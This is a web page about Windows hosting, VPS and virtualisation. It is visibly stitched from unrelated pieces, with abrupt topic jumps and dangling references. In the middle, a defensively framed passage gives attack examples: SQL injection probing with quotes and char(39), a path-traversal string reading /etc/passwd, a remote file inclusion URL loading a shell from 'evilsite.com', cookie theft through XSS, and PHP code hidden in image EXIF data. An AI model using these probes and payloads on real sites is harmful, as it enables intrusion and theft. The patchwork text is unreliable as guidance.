A VDS provides the full flexibility of a dedicated server – you are free to install your own software and configure the system to your exact needs as there are no other users – at just a fraction of the cost. They are perfect for development environments, simple applications, and sites which need the security of a dedicated server but don’t need the additional power.

DotNetPanel Express Edition, a free hosting control panel for Windows Hosting that help Windows webmaster or windows home hosting simplifying Windows Hosting management operations. This free Windows hosting control panel offers its users with greater flexibility. It is written in C# and comprises with the latest technologies such as WMI, ADSI, SOAP Web Services with Web enhancements and N velocity Templates engine.

Meanwhile, DotNetPanel Express edition support for Exchange Server 2007, Windows Share Point Services, IIS 7.0, Microsoft Dynamics CRM and a new VPS solution for complete Enterprise level automation of virtualization. It is reputed as the fastest AJAX enabled control panel.

The DNP Express Edition is ideal for VPS and dedicated server owners, home hosting, education and evaluation use. You can manage an unlimited number of domains or websites, install it on three servers with up to five users, and it runs on Windows Server 2008 Web edition. And, best of all, it’s FREE!

During this week’s Converging on Microsoft podcast interview with Mike Schutz, Director of Product Management for the Microsoft Windows Server Division, we discuss the relevant steps necessary to secure servers running Hyper-V. Microsoft has a number of resources you will find helpful (links at the end of this article) and Mike’s interview is also a great place to learn what’s happening with Hyper-V security.

One of the most valuable tools Microsoft has for securing Hyper-V is their Hyper-V Security Guide. The Hyper-V SG layouts it out in three steps: Hardening Hyper-V, Delegating Virtual Machine Management, and Protecting Virtual Machines. Here are some added thoughts and commentary beyond what the document offers.

Next try any Get Vars in your scripts and put a ‘ at the end of them what I mean is you have = you add ‘ so it’s yourwebsite.com/page?=’ or any other similar thing not only page= you may also try char(39) rather then only ‘ most PHP scripts will automatically add add slashes as a function in the MySQL read so when it goes to read it comments out the ‘ but most PHP that only uses addslashes protection will still be vuln to SQL injection simply using char(39) which the php script will read as a single quote.
If you get an error you might want to check the script.

The errors you may receive are mysql_* this is a sql injection get right on to fixing this because some one would have the ability of dumping your whole database, clients, admins, etc.

If the errors are main()or include_failed you may have just found an LFI (Local File Inclusion) OR RFI (Remote File Inclusion)…  If it is in a path like failed to include /test/file.ext ever then this is an LFI but is very useful to a hacker they have the ability to use. The following to browse into other places ../../../../ if they wanted to they’d view your passwd file via ../../../../../../etc/passwd

Well right now you’d say big Woop they got some users maybe not but still have the ability to go to any forum on
that server and upload an avatar with PHP-EXIF data in it then include it. Using this LFI once they have done this it will execute the code written in this LFI meaning they have access to Run PHP-Code on your server now not good at all…

Recommendations fix the script have mod security block all ../../../../../ to a certain point attempts.

Ok next were going to discuss the abilities of an RFI and how to block it…
So the things you can do with an RFI well lets see remotely include an PHP file that will execute its php file like so
www.yoursite.com/file.php?file=evilsite.com/shell.txt? this php file on your server would then remotely include the other file and execute the PHP code also allowing the user access to your server.

Prevention add http:// to your mod security this way when they try remotely including a file in the URL httpd:// mod_security will block it.

Ok our next subject is XSS. What can XSS do XSS means cross site scripting a hacker can execute JavaScript code on your website using this some XSS is bad which would be called permanent XSS it allows users to embed their JavaScript inside something where you wouldn’t really see it… but when you clicked they could potentially grab your cookie or any current stored browser information. With this they could use your cookie as their own to login as you… maybe even get password information from this cookie.

As for SQL injection the way to block this is to… add ‘ or /* to the mod security be sure to add in char(39) as it’s ‘ in php and php will in fact read it from a URL and interpret it as ‘ and still launch the sql injection.

One other thing you can do that is not exactly completely necessary but will help if any one does manage to get access to your website.Is you can encrypt all your db.php/conf.php/ files so that hackers cant read the information to gain access to your mysql database or gain any other passwords/usernames you might commonly use more then once.  You can do this by obfuscating the code using Zend or similar.

Finally, never leave any open upload scripts what so ever any open upload scripts left on your website will allow the hacker/attacker the ability to upload a file sure you can restrict them to only uploading JPG files or GIF,RAR etc.
But the only problem with that is unless you customize your upload script to check for EXIF data and clear it out of an image when uploading it then the hacker still has something to use against you.

Culminating in the recent hack of A2B2/Vaserv/FSCK VPS, where tens of thousands of websites were taken offline on multiple servers by exploiting a serious vulnerability in the HyperVM virtual machine management software.
http://www.theregister.co.uk/2009/06/08/webhost_attack/

Whilst automation is an important detail of an efficient system – it is even more important to ensure that the integrity of that system is not compromised by implementing the automation. In this instance, a single installation of HyperVM with root access to many dozens of servers was compromised. It is important to consider worst case scenarios with any kind of service. What is the absolute worst that could happen to my system? What would be my nightmare?

Think of your nightmare… and then multiply it a few times. Then make a contingency plan.

We would generally recommend multiple SAS (Serial Attached SCSI) disks in RAID10 configuration. The more disks you have in the RAID10 array, the best the performance overall. Fast disks make for a system that “feels” a lot faster, and will give the edge over systems using much slower SATA disks.

There are two kinds of virtualisation: software based and hardware based. In a software based virtual environment, the virtual machines share the same kernel and actually require the main node’s resources. This kind of virtualization normally has many benefits in a web hosting environment because of quota incrementing and decrementing in real time with no need to restart the node. The main examples are Xen, Virtuozzo, Vserver, and OpenVZ (which is the open source and development version of Parallels Virtuozzo Containers).